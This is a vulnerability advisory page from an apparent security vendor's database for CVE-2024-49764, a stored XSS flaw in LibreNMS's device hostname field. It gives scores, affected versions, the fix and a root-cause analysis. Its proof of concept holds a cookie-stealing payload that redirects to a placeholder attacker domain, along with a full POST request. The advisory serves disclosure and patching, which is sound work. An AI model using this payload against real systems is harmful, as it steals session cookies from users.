7.5

CVSS Score

3.1

-

CVSS Score

Basic Information

CVE ID

CVE-2024-49764

GHSA ID

GHSA-rmr4-x6c9-jc68

EPSS Score

0.05816%

CWE

CWE-79

Published

11/15/2024

Updated

12/10/2024

KEV Status

Technology

PHP

Basic Information

CVE ID

GHSA ID

EPSS Score

CWE

Published

Updated

KEV Status

Technology

Concerned about an active attack path?

Talk to our security experts and see Miggo in action.

Miggo Vulnerability Database

→

CVE-2024-49764

CVE-2024-49764: LibreNMS has a Stored XSS ('Cross-site Scripting') in librenms/includes/html/pages/device/capture.inc.php

Summary

A Stored Cross-Site Scripting (XSS) vulnerability in the "Capture Debug Information" page allows authenticated users to inject arbitrary JavaScript through the "hostname" parameter when creating a new device. This vulnerability results in the execution of malicious code when the "Capture Debug Information" page is visited, redirecting the user and sending non-httponly cookies to an attacker-controlled domain.

Details

When creating a new device, an attacker can inject the following XSS payload into the "hostname" parameter:

test'" autofocus onfocus="document.location='https://<attacker_domain>/logger.php?c='+document.cookie"

(Note: You may need to URL-encode the '+' sign in the payload.)

The payload triggers automatically when visiting the "Capture Debug Information" page for the device, redirecting the user's browser to the attacker-controlled domain along with any non-httponly cookies.

The vulnerability is due to insufficient sanitization of the "url" variable before it is output in the HTML. This is evident in the following lines of code:

https://github.com/librenms/librenms/blob/7f2ae971c4a565b0d7345fa78b4211409f96800a/includes/html/pages/device/capture.inc.php#L55

PoC

Create a new device with the following payload in the "hostname" parameter:

test'" autofocus onfocus="document.location='https://<attacker_domain>/logger.php?c='+document.cookie"

Save the device.
Navigate to the "Capture Debug Information" page for the device.
Observe that the injected script triggers and redirects the user to the attacker's domain, sending cookies.

Example Request:

POST /addhost HTTP/1.1
Host: <your_host>
Content-Type: application/x-www-form-urlencoded
Cookie: <your_cookie>

_token=<your_token>&hostname=test%27%22+autofocus+onfocus%3D%22document.location%3D%27https%3A%2F%2F<attacker_domain>%2Flogger.php%3Fc%3D%27%2bdocument.cookie%22&snmp=on&sysName=&hardware=&os=&os_id=&snmpver=v2c&port=&transport=udp&port_assoc_mode=ifIndex&community=&authlevel=noAuthNoPriv&authname=&authpass=&authalgo=SHA&cryptopass=&cryptoalgo=AES&force_add=on&Submit=

Miggo Vulnerability Database

→

CVE-2024-49764

CVE-2024-49764:

7.5

CVSS Score

3.1

-

CVSS Score

Basic Information

CVE ID

CVE-2024-49764

GHSA ID

GHSA-rmr4-x6c9-jc68

EPSS Score

0.05816%

CWE

CWE-79

Published

11/15/2024

Updated

12/10/2024

KEV Status

Technology

PHP

Basic Information

CVE ID

GHSA ID

EPSS Score

CWE

Published

Updated

KEV Status

Technology

Technical Details

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L

Package Name	Ecosystem	Vulnerable Versions	First Patched Version
librenms/librenms	composer	<= 24.9.1	24.10.0

Technical Details

Vulnerability Intelligence
Miggo AI

Root Cause Analysis

The vulnerability stems from unsanitized use of $device['hostname'] when building URLs in the $tabs array. The original code concatenated $device['hostname'] directly into the URL parameters without escaping (e.g., 'ajax_output.php?...&hostname=' . $device['hostname']). Attackers could inject malicious attributes like onfocus into the hostname, which would then be rendered in the HTML. The patch explicitly adds htmlentities()` to sanitize the hostname, confirming that the lack of escaping in these lines was the root cause. The code responsible for constructing the URLs in the $tabs array is the primary vulnerable component.

Vulnerable functions

Only Mi**o us*rs **n s** t*is s**tion

WAF Protection Rules

WAF Rule

W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.

Reasoning

*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.

7.5

-

Basic Information

Basic Information

Concerned about an active attack path?

CVE-2024-49764: LibreNMS has a Stored XSS ('Cross-site Scripting') in librenms/includes/html/pages/device/capture.inc.php

Summary

Details

PoC

CVE-2024-49764:

7.5

-

Basic Information

Basic Information

Technical Details

Technical Details

Vulnerability Intelligence
Miggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

Vulnerability Intelligence
Miggo AI

Detect and Respond To Threats Faster.

7.5

7.5

Vulnerability Intelligence
Miggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

Basic Information

Basic Information

Technical Details

CVE-2024-49764: LibreNMS has a Stored XSS ('Cross-site Scripting') in librenms/includes/html/pages/device/capture.inc.php

Summary

Details

PoC

Impact

7.5

-

Basic Information

Basic Information

Concerned about an active attack path?

CVE-2024-49764: LibreNMS has a Stored XSS ('Cross-site Scripting') in librenms/includes/html/pages/device/capture.inc.php

Summary

Details

PoC

CVE-2024-49764:

7.5

-

Basic Information

Basic Information

Technical Details

Technical Details

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

Vulnerability IntelligenceMiggo AI

7.5

7.5

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

Basic Information

Basic Information

Technical Details

CVE-2024-49764: LibreNMS has a Stored XSS ('Cross-site Scripting') in librenms/includes/html/pages/device/capture.inc.php

Summary

Details

PoC

Impact

Vulnerability Intelligence
Miggo AI

Vulnerability Intelligence
Miggo AI

Vulnerability Intelligence
Miggo AI